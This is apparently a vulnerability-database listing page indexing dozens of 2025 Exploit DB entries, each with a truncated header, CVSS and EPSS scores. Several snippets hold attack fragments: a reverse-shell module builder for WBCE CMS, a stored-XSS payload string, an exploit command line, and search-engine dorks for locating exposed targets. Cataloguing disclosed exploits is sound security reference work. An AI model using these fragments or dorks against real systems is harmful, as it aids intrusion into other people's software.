
47884 matches found

Exploit DB
added 2025/04/09 12:00 a.m., 283 views

Artica Proxy 4.50 - Remote Code Execution (RCE)

Exploit Title: Artica Proxy 4.50 - Remote Code Execution RCE Date: 23-04-2024 Exploit Author: Madan Vendor Homepage: https://artica-proxy.com/ Version: 4.40, 4.50 Tested on: relevant os CVE : CVE-2024-2054 you can also find the exploit on my github repo: https://github.com/Madan301/CVE-2024-2054...

CVSS 9.8, AI score 9.6, EPSS 0.87774
Exploits: 9
Exploit DB
added 2025/04/09 12:00 a.m., 249 views

ChurchCRM 5.9.1 - SQL Injection

Exploit Title: ChurchCRM 5.9.1 - SQL Injection Author: Sanan Qasimzada Date: 06.07.2024 Vendor: http://churchcrm.io/ Software: https://github.com/ChurchRM/CRM Reference: https://portswigger.net/web-security/sql-injection Description: In the manual insertion point 1 - parameter EID appears to be...

AI score 7.4
Exploits: 0
Exploit DB
added 2025/04/09 12:00 a.m., 227 views

Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege

Exploit Title: ManageEngine ADManager Plus Build 7210 Elevation of Privilege Vulnerability Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.manageengine.com/ Software Link: https://www.manageengine.com/products/ad-manager/ Details:...

CVSS 8.8, AI score 7.1, EPSS 0.06237
Exploits: 1
Exploit DB
added 2025/04/09 12:00 a.m., 260 views

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

Exploit Title: ResidenceCMS 2.10.1 - Stored Cross-Site Scripting XSS Date: 8-7-2024 Category: Web Application Exploit Author: Jeremia Geraldi Sihombing Version: 2.10.1 Tested on: Windows CVE: CVE-2024-39143 Description: ---------------- A stored cross-site scripting XSS vulnerability exists in...

CVSS 5.4, AI score 5.5, EPSS 0.00273
Exploits: 3
Exploit DB
added 2025/04/09 12:00 a.m., 286 views

DocsGPT 0.12.0 - Remote Code Execution

Exploit Title: DocsGPT 0.12.0 - Remote Code Execution Date: 09/04/2025 Exploit Author: Shreyas Malhotra OSMSEC Vendor Homepage: https://github.com/arc53/docsgpt Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip Version: 0.8.1 through 0.12.0 Tested on: Debian Linux/Ubunt...

CVSS 9.3, AI score 7.4, EPSS 0.17281
Exploits: 3
Exploit DB
added 2025/04/08 12:00 a.m., 434 views

jQuery 3.3.1 - Prototype Pollution & XSS Exploit

Exploit Title: jQuery Prototype Pollution & XSS Exploit CVE-2019-11358 & CVE-2020-7656 Google Dork: N/A Date: 2025-02-13 Exploit Author: xOryus Vendor Homepage: https://jquery.com Software Link: https://code.jquery.com/jquery-3.3.1.min.js Version: 3.3.1 Tested on: Windows 10, Ubuntu 20.04, Chrome...

CVSS 6.1, AI score 7.4, EPSS 0.01532
Exploits: 5
Exploit DB
added 2025/04/08 12:00 a.m., 283 views

GeoVision GV-ASManager 6.1.0.0 - Information Disclosure

Exploit Title: Information Disclosure in GeoVision GV-ASManager Google Dork: inurl:"ASWeb/Login" Date: 02-FEB-2025 Exploit Author: Giorgi Dograshvili DRAGOWN Vendor Homepage: https://www.geovision.com.tw/ Software Link: https://www.geovision.com.tw/download/product/ Version: 6.1.0.0 or less Teste...

CVSS 7.5, AI score 7.4, EPSS 0.26494
Exploits: 4
Exploit DB
added 2025/04/08 12:00 a.m., 206 views

WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation

Exploit Title: WordPress User Registration & Membership Plugin = 4.1.1 - Unauthenticated Privilege Escalation Exploit Author: Al Baradi Joy Date: 2025-04-07 Vendor Homepage: https://wordpress.org/plugins/user-registration/ Software Link:...

CVSS 8.1, AI score 7, EPSS 0.88092
Exploits: 7
Exploit DB
added 2025/04/08 12:00 a.m., 181 views

Jasmin Ransomware - Arbitrary File Download (Authenticated)

Exploit Title: Jasmin Ransomware - Authenticated Arbitrary File Download Google Dork: N/A Date: 22-03-2025 Exploit Author: bRpsd cyatlive.no Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware Software Link: https://github.com/codesiddhant/Jasmin-Ransomware Version: N/A Tested on:...

AI score 7
Exploits: 0
Exploit DB
added 2025/04/08 12:00 a.m., 249 views

Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)

Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution Date: 11-Feb-2025 Exploit Author: lkushinada Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500 Software Link: https://archive.org/details/xav-ax-5500-v-113 Version: 1.13 Tested o...

CVSS 6.8, AI score 7.4, EPSS 0.00827
Exploits: 2
Exploit DB
added 2025/04/08 12:00 a.m., 273 views

InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation

Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw Date: 22/03/2024 Exploit Author: Andrea Pasin Xenom0rph97 Researcher Homepage: https://xenom0rph97.github.io/xeno/ GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896 Software Link:...

CVSS 9.1, AI score 7.4, EPSS 0.31909
Exploits: 3
Exploit DB
added 2025/04/08 12:00 a.m., 189 views

Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)

Exploit Title: Nagiosxi authenticated Remote Code Execution Date: 17/02/2024 Exploit Author: Calil Khalil Vendor Homepage: https://www.nagios.com/products/nagios-xi/ Version: Nagios Xi 5.6.6 Tested on: Ubuntu CVE : CVE-2019-15949 python3 exp.py -t https:/// -b // -u user -p 'password' -lh -lp -k...

CVSS 9, AI score 7.4, EPSS 0.86916
Exploits: 13
Exploit DB
added 2025/04/08 12:00 a.m., 178 views

UNA CMS 14.0.0-RC - PHP Object Injection

Exploit Title: UNA CMS = 14.0.0-RC4 BxBaseMenuSetAclLevel.php PHP Object Injection Vulnerability Author: Egidio Romano aka EgiX Software link.......: https://unacms.com - Software Links: https://unacms.com https://github.com/unacms/una - Affected Versions: All versions from 9.0.0-RC1 to 14.0.0-RC...

AI score 7.4
Exploits: 0
Exploit DB
added 2025/04/07 12:00 a.m., 228 views

YesWiki 4.5.1 - Unauthenticated Path Traversal

Exploit Title: YesWiki 4.5.2 - Unauthenticated Path Traversal Exploit Author: Al Baradi Joy Exploit Date: April 6, 2025 CVE ID: CVE-2025-31131 Vendor Homepage: https://yeswiki.net/ Software Link: https://github.com/YesWiki/yeswiki Affected Version: 4.5.2 Tested On: YesWiki 4.5.1 on Ubuntu 22.04...

CVSS 8.6, AI score 7, EPSS 0.12044
Exploits: 6
Exploit DB
added 2025/04/07 12:00 a.m., 392 views

Apache Tomcat 11.0.3 - Remote Code Execution

Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution Exploit Author: Al Baradi Joy CVE: CVE-2025-24813 Date: 2025-04-06 Vendor Homepage: https://tomcat.apache.org/ Software Link: https://tomcat.apache.org/download-90.cgi Version: Apache Tomcat 11.0.3 / 10.1.35 / 9.0.98 Tested on:...

CVSS 10, AI score 7.3, EPSS 0.9413
Exploits: 44
Exploit DB
added 2025/04/07 12:00 a.m., 224 views

XWiki Platform 15.10.10 - Remote Code Execution

Exploit Title: XWiki Platform - Remote Code Execution Exploit Author: Al Baradi Joy Exploit Date: April 6, 2025 CVE ID: CVE-2025-24893 Vendor Homepage: https://www.xwiki.org/ Software Link: https://github.com/xwiki/xwiki-platform Version: Affected versions up to and including XWiki 15.10.10 Teste...

CVSS 9.8, AI score 7, EPSS 0.93701
Exploits: 49
Exploit DB
added 2025/04/06 12:00 a.m., 321 views

WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

Exploit Title: WBCE CMS " exit 1 fi if -z "$which nc" ; then echo "! Netcat is not installed." exit 1 fi ip=$1 port=$2 rm -rf shellModule.zip rm -rf shellModule mkdir shellModule echo Crafting Payload cat shellModule/info.php ?php / @category modules @package Reverse Shell @author Swammers8 @link...

AI score 7.4
Exploits: 0
Exploit DB
added 2025/04/06 12:00 a.m., 335 views

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

Exploit Title: Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Shodan Dork: html:"expedition project" FOFA Dork: "expedition project" && iconhash="1499876150" Exploit Author: ByteHunter Email: [email protected] Vulnerable Versions: 1.2 1.2.92 Tested on: 1.2.90.1 & 1.2.75 CVE ...

CVSS 9.8, AI score 9.8, EPSS 0.91029
Exploits: 9
Exploit DB
added 2025/04/06 12:00 a.m., 248 views

Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload

Exploit Title: WordPress Backup and Staging Plugin ≤ 1.21.16 - Arbitrary File Upload to RCE Original Author: Patchstack hypothetical Exploit Author: Al Baradi Joy Exploit Date: April 5, 2025 Vendor Homepage: https://wp-timecapsule.com/ Software Link: https://wordpress.org/plugins/wp-time-capsule/...

CVSS 9.8, AI score 7.4, EPSS 0.93149
Exploits: 7
Exploit DB
added 2025/04/06 12:00 a.m., 328 views

DataEase 2.4.0 - Database Configuration Information Exposure

Exploit Title: DataEase 2.4.0 - Database Configuration Information Exposure Shodan Dork: http.html:"dataease" FOFA Dork: body="dataease" && title=="DataEase" Exploit Author: ByteHunter Email: [email protected] vulnerable Versions: 2.4.0-2.5.0 Tested on: 2.4.0 CVE : CVE-2024-30269 import...

CVSS 5.3, AI score 5.4, EPSS 0.91873
Exploits: 2
Exploit DB
added 2025/04/06 12:00 a.m., 181 views

Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)

Exploit Title: Reservit Hotel Content 3. Add the following payload to the Button text French field sane save: " style=animation-name:rotation onanimationstart=alert/XSS/// 4. The XSS will trigger upon saving and when any user will access the content dashboard again References:...

CVSS 4.8, AI score 7.1, EPSS 0.01664
Exploits: 3
Exploit DB
added 2025/04/06 12:00 a.m., 282 views

Watcharr 1.43.0 - Remote Code Execution (RCE)

Exploit Title : Watcharr 1.43.0 - Remote Code Execution RCE CVE-2024-48827 exploit by Suphawith Phusanbai Affected Watcharr version 1.43.0 and below. import argparse import requests import json import jwt from pyfiglet import Figlet f = Figletfont='slant',width=100 printf.renderText'CVE-2024-4882...

CVSS 8.8, AI score 7, EPSS 0.11086
Exploits: 2
Exploit DB
added 2025/04/05 12:00 a.m., 305 views

Royal Elementor Addons and Templates 1.3.78 - Unauthenticated Arbitrary File Upload

Exploit Title: WordPress Plugin Royal Elementor Addons = 1.3.78 - Unauthenticated Arbitrary File Upload RCE Date: 2025-04-04 Exploit Author: Sheikh Mohammad Hasan https://github.com/4m3rr0r Vendor Homepage: https://royal-elementor-addons.com Software Link:...

CVSS 9.8, AI score 7.4, EPSS 0.93478
Exploits: 18
Exploit DB
added 2025/04/05 12:00 a.m., 355 views

Next.js Middleware 15.2.2 - Authorization Bypass

Exploit Title: Next.js Middleware Bypass Vulnerability CVE-2025-29927 Date: 2025-03-26 Exploit Author: kOaDT Vendor Homepage: https://nextjs.org/ Software Link: https://github.com/vercel/next.js Version: 13.0.0 - 13.5.8 / 14.0.0 - 14.2.24 / 15.0.0 - 15.2.2 / 11.1.4 - 12.3.4 Tested on: Ubuntu...

CVSS 9.1, AI score 7.4, EPSS 0.92118
Exploits: 55
Exploit DB
added 2025/04/05 12:00 a.m., 252 views

Exclusive Addons for Elementor 2.6.9 - Stored Cross-Site Scripting (XSS)

Exploit Title: Exclusive Addons for Elementor ≤ 2.6.9 - Authenticated Stored Cross-Site Scripting XSS Original Author: Wordfence Security Team Exploit Author: Al Baradi Joy Exploit Date: March 13, 2024 Vendor Homepage: https://exclusiveaddons.com/ Software Link:...

CVSS 6.4, AI score 7.4, EPSS 0.10589
Exploits: 11
Exploit DB
added 2025/04/05 12:00 a.m., 264 views

Kubio AI Page Builder 2.5.1 - Local File Inclusion (LFI)

Exploit Title: Kubio AI Page Builder = 2.5.1 - Local File Inclusion LFI Date: 2025-04-04 Exploit Author: Sheikh Mohammad Hasan https://github.com/4m3rr0r Vendor Homepage: https://wordpress.org/plugins/kubio/ Software Link: https://downloads.wordpress.org/plugin/kubio.2.5.1.zip Reference:...

CVSS 9.8, AI score 7.4, EPSS 0.69659
Exploits: 12
Exploit DB
added 2025/04/05 12:00 a.m., 351 views

IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow

Exploit Title : IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow ======== ================================================ 0. Overview 1. Detailed Description 2. Proof Of Concept 3. Solution 4. Disclosure Timeline 5. References 6. Credits 7. Legal Notices ========...

CVSS 8.2, AI score 7, EPSS 0.02244
Exploits: 3
Exploit DB
added 2025/04/05 12:00 a.m., 300 views

Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection

Exploit Title: Microchip TimeProvider 4100 Grandmaster Data plot modules 2.4.6 - SQL Injection Exploit Author: Armando Huesca Prida, Marco Negro Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli Date of Disclosure:...

CVSS 6.5, AI score 7.1, EPSS 0.01368
Exploits: 2
Exploit DB
added 2025/04/04 12:00 a.m., 293 views

Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)

Exploit Title: Microchip TimeProvider 4100 Grandmaster Banner Config Modules 2.4.6 - Stored Cross-Site Scripting XSS Exploit Author: Armando Huesca Prida Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli Date of...

CVSS 7.7, AI score 6.4, EPSS 0.02577
Exploits: 3
Exploit DB
added 2025/04/04 12:00 a.m., 228 views

Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)

Exploit Title: Angular-Base64-Upload Library 0.1.20 - Remote Code Execution RCE Date: 10 October 2024 Discovered by : Ravindu Wickramasinghe | rvz @rvizx9 Exploit Author: Ravindu Wickramasinghe | rvz @rvizx9 Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload Software Link:...

CVSS 9.8, AI score 9.6, EPSS 0.89192
Exploits: 5
Exploit DB
added 2025/04/04 12:00 a.m., 292 views

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection

Exploit Title: Microchip TimeProvider 4100 Configuration modules 2.4.6 - OS Command Injection Exploit Author: Armando Huesca Prida Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli Date of Disclosure: 27/06/2024 Date...

CVSS 8.8, AI score 8.9, EPSS 0.24573
Exploits: 3
Exploit DB
added 2025/04/03 12:00 a.m., 176 views

Nagios Log Server 2024R1.3.1 - Stored XSS

Exploit Title: Stored XSS Vulnerability in Nagios Log Server Privilege Escalation to Admin Date: 2025-04-02 Exploit Author: Seth Kraft Vendor Homepage: https://www.nagios.com/ Vendor Changelog: https://www.nagios.com/changelog/log-server Software Link:...

AI score 7.4
Exploits: 0
Exploit DB
added 2025/04/03 12:00 a.m., 164 views

ABB Cylon Aspect 3.07.02 - File Disclosure

Exploit Title : ABB Cylon Aspect 3.07.02 - File Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.07.02 Summary: ASPECT is an award-winning scalable building energy management and...

AI score 7.4
Exploits: 0
Exploit DB
added 2025/04/03 12:00 a.m., 172 views

Webmin Usermin 2.100 - Username Enumeration

Exploit Title: Webmin Usermin 2.100 - Username Enumeration Date: 10.02.2024 Exploit Author: Kjesper Vendor Homepage: https://www.webmin.com/usermin.html Software Link: https://github.com/webmin/usermin Version: = 2.100 Tested on: Kali Linux CVE: CVE-2024-44762...

CVSS 5.3, AI score 5.4, EPSS 0.13166
Exploits: 5
Exploit DB
added 2025/04/03 12:00 a.m., 160 views

ollama 0.6.4 - Server Side Request Forgery (SSRF)

Exploit Title: ollama 0.6.4 - SSRF Date: 2025-04-03 Exploit Author: sud0 Vendor Homepage: https://ollama.com/ Software Link: https://github.com/ollama/ollama/releases Version: =0.6.4 Tested on: CentOS 8 import argparse import requests import json from urllib.parse import urljoin def...

AI score 7.4
Exploits: 0
Exploit DB
added 2025/04/03 12:00 a.m., 320 views

Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure

Exploit Title: Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.office.com/ Software Link: https://www.office.com/ Details: https://github.com/passtheticket/CVE-2024-38200 Version: Microsoft Office 2019 MSO Build 1808...

CVSS 9.1, AI score 6.8, EPSS 0.59828
Exploits: 2
Exploit DB
added 2025/04/03 12:00 a.m., 177 views

Vite 6.2.2 - Arbitrary File Read

Exploit Title: Vite Arbitrary File Read - CVE-2025-30208 Date: 2025-04-03 Exploit Author: Sheikh Mohammad Hasan https://github.com/4m3rr0r Vendor Homepage: https://vitejs.dev/ Software Link: https://github.com/vitejs/vite Version: = 6.2.2, = 6.1.1, = 6.0.11, = 5.4.14, = 4.5.9 Tested on: Ubuntu...

CVSS 7.5, AI score 7.4, EPSS 0.89847
Exploits: 27
Exploit DB
added 2025/04/03 12:00 a.m., 184 views

AppSmith 1.47 - Remote Code Execution (RCE)

Exploit Title: AppSmith 1.47 - Remote Code Execution RCE Original Author: Rhino Security Labs Exploit Author: Nishanth Anand Exploit Date: April 2, 2025 Vendor Homepage: https://www.appsmith.com/ Software Link: https://github.com/appsmithorg/appsmith Version: Prior to v1.52 Tested Versions: v1.47...

CVSS 6.5, AI score 7.4, EPSS 0.37231
Exploits: 5
Exploit DB
added 2025/04/03 12:00 a.m., 229 views

ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials

Exploit Title : ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.07.01 Summary: ASPECT is an award-winning scalable building energy...

CVSS 8.8, AI score 8.9, EPSS 0.07194
Exploits: 3
Exploit DB
added 2025/04/02 12:00 a.m., 233 views

ProSSHD 1.2 - Denial of Service (DOS)

Exploit Title: ProSSHD 1.2 20090726 - Denial of Service DoS Google Dork: N/A Date: 13 january 2024 Exploit Author: Fernando Mengali Vendor Homepage: https://prosshd.com/ Software Link: N/A Version: 1.2 20090726 Tested on: Windows XP CVE: CVE-2024-0725 $sis="$^O"; if $sis eq "windows" $cmd="cls";...

CVSS 7.5, AI score 7.4, EPSS 0.02033
Exploits: 3
Exploit DB
added 2025/04/02 12:00 a.m., 329 views

ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)

Exploit Title : ABB Cylon Aspect 3.08.01 - Remote Code Execution RCE Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.01 Summary: ASPECT is an award-winning scalable building energy manageme...

CVSS 10, AI score 9.6, EPSS 0.25939
Exploits: 4
Exploit DB
added 2025/04/02 12:00 a.m., 323 views

ABB Cylon Aspect 3.08.01 - Arbitrary File Delete

Exploit Title : ABB Cylon Aspect 3.08.01 - Arbitrary File Delete Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.01 Summary: ASPECT is an award-winning scalable building energy management a...

CVSS 10, AI score 7.8, EPSS 0.42845
Exploits: 3
Exploit DB
added 2025/04/02 12:00 a.m., 281 views

Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS

Exploit Title: Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Date: 09/2024 Exploit Author: Haythem Arfaoui CBTW Team Vendor Homepage: https://www.elaine.io/ Software Link: https://www.elaine.io/en/products/elaine-marketing-automation/ Version: 6.18.17 and below Tested on: Windows, Linu...

CVSS 6.1, AI score 6.4, EPSS 0.02357
Exploits: 3
Exploit DB
added 2025/04/02 12:00 a.m., 321 views

SAP NetWeaver - 7.53 - HTTP Request Smuggling

Exploit Title: SAPGateBreaker Exploit - CVE-2022-22536 - HTTP Request Smuggling Through SAP's Front Door Google Dork: https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit/blob/main/dorks Date: Tuesday, April 2, 2025 Exploit Author: @C41Tx90 - Victor de Queiroz - Beco do Exploit - Elytron...

CVSS 10, AI score 7.4, EPSS 0.93833
Exploits: 8
Exploit DB
added 2025/03/29 12:00 a.m., 274 views

XWiki Standard 14.10 - Remote Code Execution (RCE)

Exploit Title: CVE-2023-48292 Remote Code Execution Exploit Google Dork: N/A Date: 23 March 2025 Exploit Author: Mehran Seifalinia Vendor Homepage: https://www.xwiki.org/ Software Link: https://www.xwiki.org/xwiki/bin/view/Download/ Version: XWiki Standard 14.10 Tested on: Ubuntu 20.04 LTS with...

CVSS 9.6, AI score 9.4, EPSS 0.00772
Exploits: 2
Exploit DB
added 2025/03/29 12:00 a.m., 264 views

Solstice Pod 6.2 - API Session Key Extraction via API Endpoint

Exploit Title: Solstice Pod API Session Key Extraction via API Endpoint Google Dork: N/A Date: 1/17/2025 Exploit Author: The Baldwin School Ethical Hackers Vendor Homepage: https://www.mersive.com/ Software Link: https://documentation.mersive.com/en/solstice/about-solstice.html Versions: 5.5, 6.2...

AI score 7.4
Exploits: 0
Exploit DB
added 2025/03/28 12:00 a.m., 215 views

Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass

Exploit Title: Progress Telerik Report Server 2024 Q1 10.0.24.305 - Authentication Bypass Fofa Dork: title="Telerik Report Server" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-4358 Vendor Homepage: https://www.telerik.com/report-server Software...

CVSS 9.8, AI score 9.7, EPSS 0.94344
Exploits: 14
Exploit DB
added 2025/03/28 12:00 a.m., 230 views

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

Exploit Title: Sonatype Nexus Repository 3.53.0-01 - Path Traversal Google Dork: header="Server: Nexus/3.53.0-01 OSS" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-4956 Vendor Homepage: https://www.sonatype.com/nexus-repository Software Link:...

CVSS 7.5, AI score 7.7, EPSS 0.94028
Exploits: 16
Exploit DB
added 2025/03/28 12:00 a.m., 220 views

Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution RCE Fofa Dork: "HttpFileServer" && server=="HFS 2.3m" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-23692 Vendor Homepage: http://rejetto.com/hfs/ Software Link:...

CVSS 9.8, AI score 8.8, EPSS 0.94297
Exploits: 20
Exploit DB
added 2025/03/28 12:00 a.m., 276 views

CodeCanyon RISE CRM 3.7.0 - SQL Injection

Exploit Title: CodeCanyon RISE CRM 3.7.0 - SQL Injection Google Dork: N/A Date: September 19, 2024 Exploit Author: Jobyer Ahmed Author Homepage: https://bytium.com Vulnerable Version: 3.7 Patched Version: 3.7.1 Tested on: Ubuntu 24.04, Debian Testing CVE: CVE-2024-8945 Instruction 1. Login to...

CVSS 8.8, AI score 7.2, EPSS 0.01237
Exploits: 3
Total number of security vulnerabilities: 47884